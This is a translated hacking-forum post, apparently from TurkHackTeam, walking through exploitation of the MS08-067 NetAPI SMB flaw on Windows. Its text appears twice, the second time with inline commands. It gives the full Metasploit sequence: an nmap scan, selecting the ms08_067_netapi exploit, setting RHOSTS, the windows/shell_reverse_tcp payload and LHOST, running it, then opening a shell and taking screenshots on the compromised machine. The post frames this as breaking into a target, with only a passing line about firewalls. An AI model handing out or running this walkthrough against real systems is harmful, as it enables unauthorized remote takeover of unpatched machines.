Hi TurkHackTeam members.
In this article, i will speak about Netapi (MS08-067) vulnerable and about exploiting it. I start with definitions.
What is NETAPI (MS08-067) Vulnerable ?
This vulnerable is result of a decomposition error in SMB module which is in netapi.dll. If attacker can exploit that vulnerable, he/she can run a code in target system as an full authorized. You need to still open your firewall for protect yourself from that attackers.
NETAPI (MS08-067) Vulnerable and Exploiting It
Now we'll try to get running code authority in target system with exploiting to that Netapi vulnerable.
First, we'll write this command. And we'll scan ports which have vulnerable in target system.
As you can see there is an vulnerable in 445 port. We'll try to penetrate to target system with using that netapi vulnerable. Now, we are opening métasploit with this code;
We are searching our exploit with typing this code;
We are selecting that exploit with this command;
We are typing this code for looking exploit's necessitys.
As you can see that wants to some various informations. We need to type RHOST information out of default informations. So, we'll indicate target system's IP address with this code;
We'll indicate our payload. We'll use shell_reverse_tcp payload. So, we'll indicate our payload like this;
We'll look wanted informations with typing this code;
As you can see there is an undefined LHOST information. We'll type our machine's IP address in here. Enter this code;
We are running our payload now;
As you can see, we penetrated to target system. We can run commands over system now. We can run commands which we want to run now. For this, type this command;
You can use this command for take screenshot;
Source: https://www.turkhackteam.org/siber-guvenlik/1922792-netapi-zafiyeti-ve-zafiyetin-somurulmesi.html
Translator: M3m0ry
In this article, i will speak about Netapi (MS08-067) vulnerable and about exploiting it. I start with definitions.
What is NETAPI (MS08-067) Vulnerable ?
This vulnerable is result of a decomposition error in SMB module which is in netapi.dll. If attacker can exploit that vulnerable, he/she can run a code in target system as an full authorized. You need to still open your firewall for protect yourself from that attackers.
NETAPI (MS08-067) Vulnerable and Exploiting It
Now we'll try to get running code authority in target system with exploiting to that Netapi vulnerable.
First, we'll write this command. And we'll scan ports which have vulnerable in target system.
Kod:
nmap -sT -A ip_addressAs you can see there is an vulnerable in 445 port. We'll try to penetrate to target system with using that netapi vulnerable. Now, we are opening métasploit with this code;
Kod:
msfconsoleWe are searching our exploit with typing this code;
Kod:
search ms08-067We are selecting that exploit with this command;
Kod:
use exploit/windows/smb/ms08_067_netapiWe are typing this code for looking exploit's necessitys.
Kod:
optionsAs you can see that wants to some various informations. We need to type RHOST information out of default informations. So, we'll indicate target system's IP address with this code;
Kod:
set RHOSTS ip_addressWe'll indicate our payload. We'll use shell_reverse_tcp payload. So, we'll indicate our payload like this;
Kod:
set PAYLOAD windows/shell_reverse_tcpWe'll look wanted informations with typing this code;
Kod:
optionsAs you can see there is an undefined LHOST information. We'll type our machine's IP address in here. Enter this code;
Kod:
set LHOST out_ip_addressWe are running our payload now;
Kod:
exploitAs you can see, we penetrated to target system. We can run commands over system now. We can run commands which we want to run now. For this, type this command;
Kod:
shellYou can use this command for take screenshot;
Kod:
screenshotSource: https://www.turkhackteam.org/siber-guvenlik/1922792-netapi-zafiyeti-ve-zafiyetin-somurulmesi.html
Translator: M3m0ry
Moderatör tarafında düzenlendi:
